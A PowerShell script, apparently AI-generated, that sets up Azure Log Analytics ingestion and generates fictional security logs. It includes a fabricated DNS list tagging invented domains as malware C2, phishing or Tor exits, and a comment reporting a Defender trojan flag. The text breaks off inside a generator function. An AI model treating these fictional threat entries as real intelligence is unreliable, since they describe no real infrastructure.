#!/usr/bin/env pwsh

# ==============================================================================
# DISCLAIMER
# ------------------------------------------------------------------------------
# This file was generated by an AI assistant and is entirely fictional. All data 
# contained herein — including but not limited to company names, vendor names, 
# domain names, FQDNs, IP addresses, and category labels - is fabricated for 
# testing and demonstration purposes only.
#
# - No company, product, or service name refers to any real organisation,
#   registered trademark, or existing entity.
# - No domain name or FQDN is intended to represent or impersonate any real
#   website, service, or infrastructure.
# - IP addresses use RFC 5737 TEST-NET ranges (192.0.2.0/24, 198.51.100.0/24,
#   203.0.113.0/24), which are reserved for documentation and must never be
#   used in production or routed on public networks.
# - Threat intel entries (Malware-C2, Phishing, Tor-Exit) are fictional and
#   do not represent real malicious infrastructure or actors.
#
# This data must not be used in production systems, security tooling, or any
# context where it could be mistaken for real network intelligence.
# ==============================================================================

# ⚠️ NOTE: On Windows, execution may be blocked by Defender AMSI
# Defender prevented execution of 'Trojan:PowerShell/FakeCaptcha.Y!MTB' script launched by 'pwsh.exe'

<#
.SYNOPSIS
    End-to-end Log Analytics custom table ingestion via Logs Ingestion API.
    Creates DCE → custom tables (_CL) → DCR → ingests creative dummy security logs.

.DESCRIPTION
    On first run:  creates DCE, custom _CL tables, DCR with per-vendor streams, links all together.
    On every run:  generates fresh creative dummy logs and ingests via the Logs Ingestion API.

    Authentication: System-assigned Managed Identity via `az` CLI. Requires to have "Monitoring Metrics Publisher" role on the DCR or higher level
    Tables created: SampleFwVendor2_CL, SampleEndpointVendor1_CL, SampleEndpointVendor2_CL, SampleFwVendor1_CL, SampleKubernetes_CL

    DCR schema (4 columns per your template):
      TimeGenerated  datetime  — event timestamp (2-5 min random offset)
      RawData        string    — full vendor JSON payload (parse at query time)
      SourceVendor   string    — vendor name for cross-table filtering
      FileName       string    — synthetic source identifier (vendor + date shard)

.PARAMETER ResourceGroup      Resource group containing the Log Analytics Workspace
.PARAMETER WorkspaceName      Log Analytics Workspace name
.PARAMETER Location           Azure region (default: germanywestcentral)
.PARAMETER SubscriptionId     Azure Subscription ID (defaults to current az cli context)
.PARAMETER RecordsPerVendor   How many log records to generate per vendor per run (default: 15)
.PARAMETER SkipInfraSetup     Skip DCE/DCR/table creation (use on subsequent runs for speed)

.EXAMPLE
    # First run — full setup + ingest
    ./Invoke-SecurityLogIngestion.ps1 -ResourceGroup "my-rg-security" -WorkspaceName "my-law-001"

    # Subsequent runs — skip infra, just ingest
    ./Invoke-SecurityLogIngestion.ps1 -ResourceGroup "my-rg-security" -WorkspaceName "my-law-001" -SkipInfraSetup
#>

param(
    [Parameter(Mandatory)]
    [string]$ResourceGroup,

    [Parameter(Mandatory)]
    [string]$WorkspaceName,
    
    [string]$Location = "germanywestcentral",
    [string]$SubscriptionId,
	
    [int]$RecordsPerVendor = 15,
    [switch]$SkipInfraSetup,
	
	[string]$DceName = "dce-fake-security-logs",
	[string]$DcrName = "dcr-fake-security-vendors"
)

Set-StrictMode -Version Latest
$ErrorActionPreference = 'Stop'

# ============================================================
# 0.  Prereq checks & auth
# ============================================================

foreach ($cmd in @("az","jq")) {
    if (-not (Get-Command $cmd -ErrorAction SilentlyContinue)) {
        throw "Required command '$cmd' not found in PATH."
    }
}

Write-Host "`n[AUTH] Acquiring token via System-Assigned Managed Identity..." -ForegroundColor Cyan
$tokenJson   = az account get-access-token --resource "https://monitor.azure.com/" --output json 2>&1
if ($LASTEXITCODE -ne 0) { throw "az account get-access-token failed: $tokenJson" }
$tokenObj    = $tokenJson | ConvertFrom-Json
$BearerToken = $tokenObj.accessToken
Write-Host "[AUTH] Token acquired (expires: $($tokenObj.expiresOn))" -ForegroundColor Green

if ($SubscriptionId -eq "") {
    $SubscriptionId = (az account show --query id -o tsv).Trim()
}
Write-Host "[AUTH] Subscription: $SubscriptionId"

$ArmToken = (az account get-access-token --resource "https://management.azure.com/" --output json | ConvertFrom-Json).accessToken

# ============================================================
# 1.  Stable reference data  (consistent across runs — used for correlation)
# ============================================================

$StableDevices = @(
	@{ Name="WIN-CLIENT-01";IP="10.10.1.50"; MAC="00:1A:2B:3C:4D:00"; OS="Windows 11"; Site="Munich" }
    @{ Name="WIN-PROD-01";  IP="10.10.1.11"; MAC="00:1A:2B:3C:4D:01"; OS="Windows Server 2022"; Site="London" }
    @{ Name="WIN-PROD-02";  IP="10.10.1.12"; MAC="00:1A:2B:3C:4D:02"; OS="Windows Server 2019"; Site="London" }
    @{ Name="LINUX-APP-01"; IP="10.10.2.21"; MAC="00:1A:2B:3C:4E:01"; OS="Ubuntu 22.04 LTS";    Site="Chicago" }
    @{ Name="LINUX-APP-02"; IP="10.10.2.22"; MAC="00:1A:2B:3C:4E:02"; OS="RHEL 9.3";            Site="Chicago" }
    @{ Name="KUBE-NODE-01"; IP="10.10.3.31"; MAC="00:1A:2B:3C:4F:01"; OS="Ubuntu 22.04 LTS";    Site="Swedencentral" }
    @{ Name="KUBE-NODE-02"; IP="10.10.3.32"; MAC="00:1A:2B:3C:4F:02"; OS="Ubuntu 22.04 LTS";    Site="Swedencentral" }
    @{ Name="DMZ-GW-01";    IP="172.16.1.1"; MAC="00:1A:2B:3C:50:01"; OS="PAN-OS 10.2";         Site="DMZ" }
    @{ Name="DMZ-GW-02";    IP="172.16.1.2"; MAC="00:1A:2B:3C:50:02"; OS="FwVendor2 R80.40";    Site="DMZ" }
)

$StableUsers = @(
    @{ Id="U001"; Name="j.dupont";        Display="Jean Dupont";        Dept="Engineering";    Priv="standard" }
    @{ Id="U002"; Name="m.mustermann";    Display="Max Mustermann";     Dept="Finance";        Priv="standard" }
    @{ Id="U003"; Name="g.rossi";         Display="Giuseppe Rossi";     Dept="IT-Ops";         Priv="admin"    }
    @{ Id="U004"; Name="a.garcia";        Display="Ana Garcia";         Dept="Security";       Priv="admin"    }
    @{ Id="U005"; Name="j.janssen";       Display="Jan Janssen";        Dept="HR";             Priv="standard" }
    @{ Id="U006"; Name="svc_backup";      Display="Backup Service Acct";Dept="IT-Ops";         Priv="service"  }
    @{ Id="U007"; Name="svc_monitoring";  Display="Monitoring Service"; Dept="IT-Ops";         Priv="service"  }
)

$StableExternalIPs = @(
    "203.0.113.202"
    "203.0.113.200"
    "203.0.113.201"
	"203.0.113.42"
    "198.51.100.50"
    "198.51.100.10"
    "198.51.100.41"
    "198.51.100.77"
    "192.0.2.11"
    "192.0.2.20"
    "192.0.2.22"
    "192.0.2.21"
    "192.0.2.10"
    "192.0.2.90" 
    "198.51.100.10"
    "198.51.100.30"
    "203.0.113.10"
    "203.0.113.40"
    "203.0.113.30"
)

# ============================================================
# Stable DNS records — FQDN → resolved IP, category, vendor
# Used by all generators to produce realistic DNS query/answer
# logs, URL filter events, and proxy traffic records.
# ============================================================
$StableDnsRecords = @(
    # ── Delvorn ──────────────────────────────────
    @{ FQDN="wupdate.delvorn-infra.net";              IP="192.0.2.10";    Category="Updates";   Vendor="Delvorn";   Consumer=$false; RType="A";     TTL=300  }
    @{ FQDN="svc-update.delvorn-infra.net";           IP="192.0.2.10";    Category="Updates";   Vendor="Delvorn";   Consumer=$false; RType="A";     TTL=300  }
    @{ FQDN="dl.wupdate.delvorn-infra.net";           IP="192.0.2.11";    Category="Updates";   Vendor="Delvorn";   Consumer=$false; RType="CNAME"; TTL=60   }
    @{ FQDN="delivery.patch.delvorn-infra.net";       IP="192.0.2.11";    Category="Updates";   Vendor="Delvorn";   Consumer=$false; RType="A";     TTL=60   }
    @{ FQDN="fe3.delivery.delvorn-infra.net";         IP="192.0.2.11";    Category="Updates";   Vendor="Delvorn";   Consumer=$false; RType="CNAME"; TTL=60   }
    @{ FQDN="trafficshape.delvorn-infra.net";         IP="192.0.2.11";    Category="Updates";   Vendor="Delvorn";   Consumer=$false; RType="CNAME"; TTL=60   }
    # ── Delvorn — Mail ───────────────────────────────────────────────────────
    @{ FQDN="mail.orventis-cloud.org";                IP="192.0.2.20";    Category="Mail";               Vendor="Delvorn";   Consumer=$false; RType="A";     TTL=3600 }
    @{ FQDN="webmail.orventis-cloud.org";             IP="192.0.2.20";    Category="Mail";               Vendor="Delvorn";   Consumer=$false; RType="CNAME"; TTL=3600 }
    @{ FQDN="smtp.orventis-cloud.org";                IP="192.0.2.21";    Category="Mail";               Vendor="Delvorn";   Consumer=$false; RType="A";     TTL=3600 }
    @{ FQDN="autodiscover.orventis-cloud.org";        IP="192.0.2.20";    Category="Mail";               Vendor="Delvorn";   Consumer=$false; RType="CNAME"; TTL=3600 }
    @{ FQDN="eop.braxmail-relay.net";                 IP="192.0.2.22";    Category="Mail";               Vendor="Delvorn";   Consumer=$false; RType="A";     TTL=300  }
    @{ FQDN="mx.braxmail-relay.net";                  IP="192.0.2.22";    Category="Mail";               Vendor="Delvorn";   Consumer=$false; RType="MX";    TTL=3600 }
    # ── Delvorn — Collaboration ──────────────────────────────────────────────
    @{ FQDN="intranet.quelport-corp.com";             IP="192.0.2.30";    Category="Collaboration";      Vendor="Delvorn";   Consumer=$false; RType="A";     TTL=3600 }
    @{ FQDN="mysite.quelport-corp.com";               IP="192.0.2.30";    Category="Collaboration";      Vendor="Delvorn";   Consumer=$false; RType="CNAME"; TTL=3600 }
    @{ FQDN="cdn.quelport-corp.com";                  IP="192.0.2.30";    Category="Collaboration";      Vendor="Delvorn";   Consumer=$false; RType="CNAME"; TTL=300  }
    @{ FQDN="static.quelport-corp.com";               IP="192.0.2.30";    Category="Collaboration";      Vendor="Delvorn";   Consumer=$false; RType="A";     TTL=300  }
    # ── Delvorn — Personal Drive ─────────────────────────────────────────────
    @{ FQDN="files.troven-storage.net";               IP="192.0.2.40";    Category="PersonalDrive";      Vendor="Delvorn";   Consumer=$true;  RType="A";     TTL=300  }
    @{ FQDN="api.troven-storage.net";                 IP="192.0.2.40";    Category="PersonalDrive";      Vendor="Delvorn";   Consumer=$false; RType="CNAME"; TTL=300  }
    @{ FQDN="store.troven-storage.net";               IP="192.0.2.40";    Category="PersonalDrive";      Vendor="Delvorn";   Consumer=$true;  RType="A";     TTL=300  }
    @{ FQDN="skyapi.troven-storage.net";              IP="192.0.2.40";    Category="PersonalDrive";      Vendor="Delvorn";   Consumer=$false; RType="CNAME"; TTL=60   }
    # ── Delvorn — Calling ────────────────────────────────────────────────────
    @{ FQDN="collab.phovex-enterprise.com";           IP="192.0.2.50";    Category="Calling";            Vendor="Delvorn";   Consumer=$false; RType="A";     TTL=300  }
    @{ FQDN="meet.phovex-live.net";                   IP="192.0.2.50";    Category="Calling";            Vendor="Delvorn";   Consumer=$true;  RType="A";     TTL=300  }
    @{ FQDN="api.relvox-svc.net";                     IP="192.0.2.50";    Category="Calling";            Vendor="Delvorn";   Consumer=$false; RType="A";     TTL=60   }
    @{ FQDN="statics.phovex-cdn.net";                 IP="192.0.2.51";    Category="Calling";            Vendor="Delvorn";   Consumer=$false; RType="CNAME"; TTL=300  }
    @{ FQDN="config.phovex-enterprise.com";           IP="192.0.2.50";    Category="Calling";            Vendor="Delvorn";   Consumer=$false; RType="A";     TTL=300  }
    @{ FQDN="pipe.relvox-svc.net";                    IP="192.0.2.50";    Category="Calling";            Vendor="Delvorn";   Consumer=$false; RType="A";     TTL=60   }
    @{ FQDN="assets.phovex-cdn.net";                  IP="192.0.2.51";    Category="Calling";            Vendor="Delvorn";   Consumer=$false; RType="CNAME"; TTL=300  }
    # ── Delvorn — Identity ───────────────────────────────────────────────────
    @{ FQDN="login.vortian-id.com";                   IP="192.0.2.60";    Category="Identity";           Vendor="Delvorn";   Consumer=$false; RType="A";     TTL=300  }
    @{ FQDN="auth.vortian-id.com";                    IP="192.0.2.60";    Category="Identity";           Vendor="Delvorn";   Consumer=$false; RType="CNAME"; TTL=300  }
    @{ FQDN="cdn.vortian-static.net";                 IP="192.0.2.61";    Category="Identity";           Vendor="Delvorn";   Consumer=$false; RType="CNAME"; TTL=300  }
    @{ FQDN="graph.vortian-id.com";                   IP="192.0.2.60";    Category="Identity";           Vendor="Delvorn";   Consumer=$false; RType="A";     TTL=300  }
    # ── Delvorn — Cloud Portal / Management ─────────────────────────────────
    @{ FQDN="portal.struven-cloud.net";               IP="192.0.2.70";    Category="CloudPortal";        Vendor="Delvorn";   Consumer=$false; RType="A";     TTL=300  }
    @{ FQDN="mgmt.struven-cloud.net";                 IP="192.0.2.71";    Category="CloudManagement";    Vendor="Delvorn";   Consumer=$false; RType="A";     TTL=300  }
    # ── Delvorn — Cloud Monitor ──────────────────────────────────────────────
    @{ FQDN="law01.quelmetric-insights.net";          IP="192.0.2.80";    Category="CloudMonitor";       Vendor="Delvorn";   Consumer=$false; RType="A";     TTL=60   }
    @{ FQDN="oms01.quelmetric-insights.net";          IP="192.0.2.80";    Category="CloudMonitor";       Vendor="Delvorn";   Consumer=$false; RType="A";     TTL=60   }
    @{ FQDN="global.handler.quelmetric-ctrl.net";     IP="192.0.2.81";    Category="CloudMonitor";       Vendor="Delvorn";   Consumer=$false; RType="A";     TTL=300  }
    # ── Delvorn — PKI ────────────────────────────────────────────────────────
    @{ FQDN="crl.pki-delvorn.net";                    IP="192.0.2.11";    Category="PKI-CRL";            Vendor="Delvorn";   Consumer=$false; RType="A";     TTL=3600 }
    @{ FQDN="ocsp.pki-delvorn.net";                   IP="192.0.2.11";    Category="PKI-OCSP";           Vendor="Delvorn";   Consumer=$false; RType="A";     TTL=300  }
    @{ FQDN="ocsp.crelox-ca.com";                     IP="203.0.113.90";  Category="PKI-OCSP";           Vendor="Crelox";    Consumer=$false; RType="A";     TTL=300  }
    @{ FQDN="crl.crelox-ca.com";                      IP="203.0.113.90";  Category="PKI-CRL";            Vendor="Crelox";    Consumer=$false; RType="A";     TTL=3600 }
    # ── Delvorn — NTP ────────────────────────────────────────────────────────
    @{ FQDN="ntp.clocksync-delvorn.net";              IP="192.0.2.11";    Category="NTP";                Vendor="Delvorn";   Consumer=$false; RType="A";     TTL=3600 }
    @{ FQDN="pool.timesync-veltru.org";               IP="203.0.113.100"; Category="NTP";                Vendor="Veltru";    Consumer=$false; RType="A";     TTL=300  }
    @{ FQDN="ntp.proven-time.org";                    IP="203.0.113.101"; Category="NTP";                Vendor="Proven";    Consumer=$false; RType="A";     TTL=300  }
    # ── Delvorn — Search / Browser ───────────────────────────────────────────
    @{ FQDN="search.quendrix-web.com";                IP="192.0.2.90";    Category="Search";             Vendor="Delvorn";   Consumer=$true;  RType="A";     TTL=3600 }
    @{ FQDN="www.quendrix-web.com";                   IP="192.0.2.90";    Category="Search";             Vendor="Delvorn";   Consumer=$true;  RType="A";     TTL=3600 }
    @{ FQDN="r.quendrix-web.com";                     IP="192.0.2.91";    Category="Search";             Vendor="Delvorn";   Consumer=$true;  RType="A";     TTL=300  }
    @{ FQDN="img.quendrix-cdn.net";                   IP="192.0.2.90";    Category="Search-CDN";         Vendor="Delvorn";   Consumer=$true;  RType="CNAME"; TTL=300  }
    @{ FQDN="telemetry.worvex-browser.net";           IP="192.0.2.92";    Category="Browser-Telemetry";  Vendor="Delvorn";   Consumer=$true;  RType="A";     TTL=300  }
    # ── Wabren ────────────────────────────────────────────
    @{ FQDN="search.wabren-web.com";                  IP="198.51.100.10"; Category="Search";             Vendor="Wabren";    Consumer=$true;  RType="A";     TTL=300  }
    @{ FQDN="www.wabren-web.com";                     IP="198.51.100.10"; Category="Search";             Vendor="Wabren";    Consumer=$true;  RType="A";     TTL=300  }
    @{ FQDN="api.wabren-cloud.net";                   IP="198.51.100.11"; Category="Wabren-APIs";        Vendor="Wabren";    Consumer=$false; RType="A";     TTL=300  }
    @{ FQDN="accounts.wabren-web.com";                IP="198.51.100.12"; Category="Wabren-Auth";        Vendor="Wabren";    Consumer=$true;  RType="A";     TTL=300  }
    @{ FQDN="static.wabren-cdn.net";                  IP="198.51.100.13"; Category="Wabren-CDN";         Vendor="Wabren";    Consumer=$true;  RType="CNAME"; TTL=300  }
    @{ FQDN="tagmgr.wabren-analytics.com";            IP="198.51.100.14"; Category="Analytics";          Vendor="Wabren";    Consumer=$true;  RType="A";     TTL=300  }
    @{ FQDN="fonts.wabren-cloud.net";                 IP="198.51.100.11"; Category="Wabren-CDN";         Vendor="Wabren";    Consumer=$true;  RType="CNAME"; TTL=3600 }
    @{ FQDN="safebrowse.wabren-cloud.net";            IP="198.51.100.11"; Category="Wabren-Security";    Vendor="Wabren";    Consumer=$false; RType="A";     TTL=300  }
    # ── Morriven ─────────────────────────────────────────
    @{ FQDN="watch.morriven-stream.com";              IP="198.51.100.20"; Category="Video-Streaming";    Vendor="Morriven";  Consumer=$true;  RType="A";     TTL=300  }
    @{ FQDN="www.morriven-stream.com";                IP="198.51.100.20"; Category="Video-Streaming";    Vendor="Morriven";  Consumer=$true;  RType="A";     TTL=300  }
    @{ FQDN="short.morriven-stream.com";              IP="198.51.100.20"; Category="Video-Streaming";    Vendor="Morriven";  Consumer=$true;  RType="CNAME"; TTL=300  }
    @{ FQDN="video.morriven-delivery.net";            IP="198.51.100.21"; Category="Video-Streaming";    Vendor="Morriven";  Consumer=$true;  RType="A";     TTL=60   }
    @{ FQDN="img.morriven-static.net";                IP="198.51.100.22"; Category="Video-CDN";          Vendor="Morriven";  Consumer=$true;  RType="CNAME"; TTL=300  }
    @{ FQDN="thumb.morriven-static.net";              IP="198.51.100.22"; Category="Video-CDN";          Vendor="Morriven";  Consumer=$true;  RType="CNAME"; TTL=300  }
    @{ FQDN="go.morriven-stream.com";                 IP="198.51.100.20"; Category="Video-Streaming";    Vendor="Morriven";  Consumer=$true;  RType="CNAME"; TTL=300  }
    # ── Zelprix ──────────────────────────────────────────
    @{ FQDN="play.zelprix-app.com";                   IP="198.51.100.30"; Category="Audio-Streaming";    Vendor="Zelprix";   Consumer=$true;  RType="A";     TTL=300  }
    @{ FQDN="open.zelprix-app.com";                   IP="198.51.100.30"; Category="Audio-Streaming";    Vendor="Zelprix";   Consumer=$true;  RType="A";     TTL=300  }
    @{ FQDN="api.zelprix-app.com";                    IP="198.51.100.31"; Category="Audio-Streaming";    Vendor="Zelprix";   Consumer=$true;  RType="A";     TTL=60   }
    @{ FQDN="resolve.zelprix-app.com";                IP="198.51.100.30"; Category="Audio-Streaming";    Vendor="Zelprix";   Consumer=$true;  RType="A";     TTL=60   }
    @{ FQDN="media.zelprix-cdn.net";                  IP="198.51.100.32"; Category="Audio-CDN";          Vendor="Zelprix";   Consumer=$true;  RType="CNAME"; TTL=300  }
    @{ FQDN="audio.zelprix-cdn.net";                  IP="198.51.100.32"; Category="Audio-CDN";          Vendor="Zelprix";   Consumer=$true;  RType="A";     TTL=60   }
    @{ FQDN="heads.zelprix-app.com";                  IP="198.51.100.30"; Category="Audio-Streaming";    Vendor="Zelprix";   Consumer=$true;  RType="A";     TTL=30   }
    @{ FQDN="dealer.zelprix-app.com";                 IP="198.51.100.30"; Category="Audio-Streaming";    Vendor="Zelprix";   Consumer=$true;  RType="A";     TTL=30   }
    # ── Trellox ───────────────────────────────────────────
    @{ FQDN="code.trellox-hub.io";                    IP="203.0.113.10";  Category="DevTools";           Vendor="Trellox";   Consumer=$false; RType="A";     TTL=3600 }
    @{ FQDN="api.trellox-hub.io";                     IP="203.0.113.11";  Category="DevTools";           Vendor="Trellox";   Consumer=$false; RType="A";     TTL=60   }
    @{ FQDN="registry.trellox-hub.io";                IP="203.0.113.12";  Category="Container-Registry"; Vendor="Trellox";   Consumer=$false; RType="A";     TTL=300  }
    @{ FQDN="objects.trellox-static.net";             IP="203.0.113.13";  Category="DevTools-CDN";       Vendor="Trellox";   Consumer=$false; RType="CNAME"; TTL=300  }
    @{ FQDN="raw.trellox-static.net";                 IP="203.0.113.13";  Category="DevTools-CDN";       Vendor="Trellox";   Consumer=$false; RType="A";     TTL=300  }
    @{ FQDN="download.trellox-hub.io";                IP="203.0.113.14";  Category="DevTools";           Vendor="Trellox";   Consumer=$false; RType="A";     TTL=300  }
    # ── Ountrex  ─────────────────────────────────────────
    @{ FQDN="connect.ountrex-net.com";                IP="203.0.113.20";  Category="Social-Media";       Vendor="Ountrex";   Consumer=$true;  RType="A";     TTL=300  }
    # ── Velstric ────────────────────────────────────────────
    @{ FQDN="www.velstric-social.net";                IP="203.0.113.30";  Category="Social-Media";       Vendor="Velstric";  Consumer=$true;  RType="A";     TTL=300  }
    @{ FQDN="photos.velstric-social.net";             IP="203.0.113.30";  Category="Social-Media";       Vendor="Velstric";  Consumer=$true;  RType="A";     TTL=300  }
    @{ FQDN="chat.velstric-msg.net";                  IP="203.0.113.31";  Category="Messaging";          Vendor="Velstric";  Consumer=$true;  RType="A";     TTL=300  }
    # ── Fenvark  ────────────────────────────────────────
    @{ FQDN="www.fenvark-net.com";                    IP="203.0.113.40";  Category="Social-Media";       Vendor="Fenvark";   Consumer=$true;  RType="A";     TTL=300  }
    @{ FQDN="short.fenvark-net.com";                  IP="203.0.113.40";  Category="Social-Media";       Vendor="Fenvark";   Consumer=$true;  RType="A";     TTL=300  }
    # ── Peltrox  ───────────────────────────────────────
    @{ FQDN="www.peltrox-cdn.net";                    IP="198.51.100.40"; Category="CDN-Infrastructure"; Vendor="Peltrox";   Consumer=$false; RType="A";     TTL=300  }
    @{ FQDN="libs.peltrox-cdn.net";                   IP="198.51.100.40"; Category="CDN-Infrastructure"; Vendor="Peltrox";   Consumer=$false; RType="CNAME"; TTL=300  }
    @{ FQDN="doh.peltrox-dns.net";                    IP="198.51.100.41"; Category="DNS-over-HTTPS";     Vendor="Peltrox";   Consumer=$false; RType="A";     TTL=300  }
    # ── Threat Intel ─────────────────────────────────────────────────────────
    @{ FQDN="patch-svc.drobbix-xyz.com";              IP="203.0.113.200"; Category="Malware-C2";         Vendor="Unknown";   Consumer=$false; RType="A";     TTL=60   }
    @{ FQDN="assets.quelvex-top.net";                 IP="203.0.113.201"; Category="Malware-C2";         Vendor="Unknown";   Consumer=$false; RType="A";     TTL=30   }
    @{ FQDN="metrics.wovrint-svc.org";                IP="203.0.113.202"; Category="Tor-Exit";           Vendor="Unknown";   Consumer=$false; RType="A";     TTL=30   }
    @{ FQDN="login.vrenix-account-check.com";         IP="203.0.113.210"; Category="Phishing";           Vendor="Unknown";   Consumer=$false; RType="A";     TTL=30   }
    @{ FQDN="update.delvorn-patchportal.com";         IP="203.0.113.211"; Category="Phishing";           Vendor="Unknown";   Consumer=$false; RType="A";     TTL=30   }
    @{ FQDN="alert.worvex-notify.com";                IP="203.0.113.212"; Category="Phishing";           Vendor="Unknown";   Consumer=$false; RType="A";     TTL=30   }
)

# ============================================================
# 2.  Utility helpers
# ============================================================

function Get-RandomTs {
    $off = Get-Random -Minimum 120 -Maximum 300
    return (Get-Date).ToUniversalTime().AddSeconds(-$off)
}

function Get-IsoTs([datetime]$ts) { return $ts.ToString("yyyy-MM-ddTHH:mm:ss.fffZ") }

function Pick([array]$arr) { return $arr[(Get-Random -Min 0 -Max $arr.Count)] }

function RandInt([int]$min, [int]$max) { return Get-Random -Minimum $min -Maximum $max }

function New-Guid8 { return ([guid]::NewGuid().ToString().Split('-')[0]).ToUpper() }

function Get-RandomDevice { return Pick $StableDevices }
function Get-RandomUser   { return Pick $StableUsers }
function Get-RandomExtIP  { return Pick $StableExternalIPs }
function Get-RandomDnsRecord              { return Pick $StableDnsRecords }
function Get-DnsRecordsByCategory([string]$cat) {
    $matches = $StableDnsRecords | Where-Object { $_.Category -eq $cat }
    if ($matches.Count -gt 0) { return Pick @($matches) }
    return Pick $StableDnsRecords
}
function Get-DnsRecordsByVendor([string]$v) {
    $matches = $StableDnsRecords | Where-Object { $_.Vendor -eq $v }
    if ($matches.Count -gt 0) { return Pick @($matches) }
    return Pick $StableDnsRecords
}
function Get-ConsumerDnsRecord {
    $matches = $StableDnsRecords | Where-Object { $_.Consumer -eq $true }
    return Pick @($matches)
}
function Get-CorporateDnsRecord {
    $matches = $StableDnsRecords | Where-Object { $_.Consumer -eq $false }
    return Pick @($matches)
}
function Get-ThreatDnsRecord {
    $matches = $StableDnsRecords | Where-Object { $_.Category -in @("Malware-C2","Phishing","Tor-Exit") }
    return Pick @($matches)
}


# Weighted severity so criticals are rarer
function Get-WeightedSeverity {
    $roll = RandInt 1 100
    if     ($roll -le 5)  { return "Critical" }
    elseif ($roll -le 20) { return "High" }
    elseif ($roll -le 50) { return "Medium" }
    else                  { return "Low" }
}

function Get-SeverityNum([string]$sev) {
    switch ($sev) { "Critical"{10} "High"{8} "Medium"{5} "Low"{3} default{1} }
}

# ============================================================
# 3.  ARM helper (Invoke-ArmApi)
# ============================================================

function Invoke-ArmApi {
    param(
        [string]$Method,
        [string]$Uri,
        [object]$Body = $null
    )
    $headers = @{
        "Authorization" = "Bearer $ArmToken"
        "Content-Type"  = "application/json"
    }
    $params = @{ Method=$Method; Uri=$Uri; Headers=$headers; ErrorAction="Stop" }
    if ($Body) { $params.Body = ($Body | ConvertTo-Json -Depth 20 -Compress) }
    try {
        return Invoke-RestMethod @params
    } catch {
        $msg = $_.ErrorDetails?.Message ?? $_.Exception.Message
        Write-Warning "ARM API error [$Method $Uri]: $msg"
        throw
    }
}

# ============================================================
# 4.  Infrastructure setup
# ============================================================

# Vendor short names — tables will be "Sample<Vendor>_CL", streams "Custom-Sample<Vendor>_CL"
$TableBase  = @("FwVendor2","EndpointVendor1","EndpointVendor2","FwVendor1","Kubernetes")
$TablePrefix = "Sample"

# DCR schema — 4 columns matching the provided template (all vendor detail in RawData)
$DcrColumns = @(
    @{ name="TimeGenerated"; type="datetime" }
    @{ name="RawData";       type="string"   }
    @{ name="SourceVendor";  type="string"   }
    @{ name="FileName";      type="string"   }
)

# --- 4a. Resolve workspace resource ID & customer ID ---
Write-Host "`n[SETUP] Resolving workspace..." -ForegroundColor Cyan
$wsUri  = "https://management.azure.com/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroup/providers/Microsoft.OperationalInsights/workspaces/$($WorkspaceName)?api-version=2023-09-01"
$ws     = Invoke-ArmApi -Method GET -Uri $wsUri
$WsId   = $ws.id
$WsCustomerId = $ws.properties.customerId
Write-Host "[SETUP] Workspace ID      : $WsId"

if (-not $SkipInfraSetup) {

    # --- 4b. Create or update DCE ---
    Write-Host "`n[INFRA] Creating/updating DCE: $DceName..." -ForegroundColor Cyan
    $dceUri  = "https://management.azure.com/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroup/providers/Microsoft.Insights/dataCollectionEndpoints/$($DceName)?api-version=2023-03-11"
    $dceBody = @{
        location   = $Location
        kind       = "Linux"
        properties = @{ networkAcls = @{ publicNetworkAccess = "Enabled" } }
    }
    $dce = Invoke-ArmApi -Method PUT -Uri $dceUri -Body $dceBody
    $DceId            = $dce.id
    $DceIngestionUrl  = $dce.properties.logsIngestion.endpoint
    Write-Host "[INFRA] DCE created: $DceId"
    Write-Host "[INFRA] Ingestion endpoint: $DceIngestionUrl"

    # --- 4c. Create custom _CL tables with the 4-column DCR schema ---
    foreach ($vendor in $TableBase) {
        $tableName = "${TablePrefix}${vendor}_CL"
        Write-Host "[INFRA] Creating table $tableName..." -ForegroundColor Cyan
        $tblUri  = "https://management.azure.com$WsId/tables/$($tableName)?api-version=2023-09-01"
        $tblBody = @{
            properties = @{
                schema = @{
                    name    = $tableName
                    columns = $DcrColumns
                }
                retentionInDays      = 30
                totalRetentionInDays = 30
            }
        }
        try {
            Invoke-ArmApi -Method PUT -Uri $tblUri -Body $tblBody | Out-Null
            Write-Host "[INFRA] Table $tableName created/updated." -ForegroundColor Green
        } catch {
            Write-Warning "Table $tableName may already exist or creation is async — continuing."
        }
    }

    # --- 4d. Create / update DCR — one rule, one stream per vendor, matching provided template ---
    Write-Host "`n[INFRA] Creating/updating DCR: $DcrName..." -ForegroundColor Cyan

    $streamDeclarations = @{}
    $dataFlows          = @()

    foreach ($vendor in $TableBase) {
        $streamName = "Custom-${TablePrefix}${vendor}_CL"
        $streamDeclarations[$streamName] = @{ columns = $DcrColumns }
        $dataFlows += @{
            streams         = @($streamName)
            destinations    = @("sentinel-workspace")
            transformKql    = "source"
            outputStream    = $streamName
        }
    }

    $dcrUri  = "https://management.azure.com/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroup/providers/Microsoft.Insights/dataCollectionRules/$($DcrName)?api-version=2023-03-11"
    $dcrBody = @{
        location   = $Location
        properties = @{
            dataCollectionEndpointId = $dce.id
            streamDeclarations       = $streamDeclarations
            destinations             = @{
                logAnalytics = @(
                    @{ workspaceResourceId = $WsId; name = "sentinel-workspace" }
                )
            }
            dataFlows                = $dataFlows
        }
    }
    $dcr            = Invoke-ArmApi -Method PUT -Uri $dcrUri -Body $dcrBody
    $DcrId          = $dcr.id
    $DcrImmutableId = $dcr.properties.immutableId
    Write-Host "[INFRA] DCR created : $DcrId"
    Write-Host "[INFRA] Immutable ID: $DcrImmutableId"

    # Persist config for subsequent runs
    @{
        DceIngestionUrl = $DceIngestionUrl
        DcrImmutableId  = $DcrImmutableId
    } | ConvertTo-Json | Set-Content -Path "ingestion-config.json"

} else {
    # Load persisted config
    $cfg = Get-Content "ingestion-config.json" | ConvertFrom-Json
    $DceIngestionUrl = $cfg.DceIngestionUrl
    $DcrImmutableId  = $cfg.DcrImmutableId
    Write-Host "[SETUP] Loaded config — DCE: $DceIngestionUrl  DCR: $DcrImmutableId"
}

# ============================================================
# 5.  Creative log generators
# ============================================================

# ---------- FwVendor2 ----------
function New-FwVendor2Records {
    $records = @()
    $categories = @("Firewall","VPN","IPS","Application Control","URL Filtering","Anti-Bot","Anti-Virus","Threat Emulation")
    $bladeMap   = @{
        "Firewall"="Network Policy"; "VPN"="Remote Access"; "IPS"="Intrusion Prevention"
        "Application Control"="App Ctrl"; "URL Filtering"="URLF"
        "Anti-Bot"="Anti-Bot"; "Anti-Virus"="Anti-Virus"; "Threat Emulation"="TE"
    }
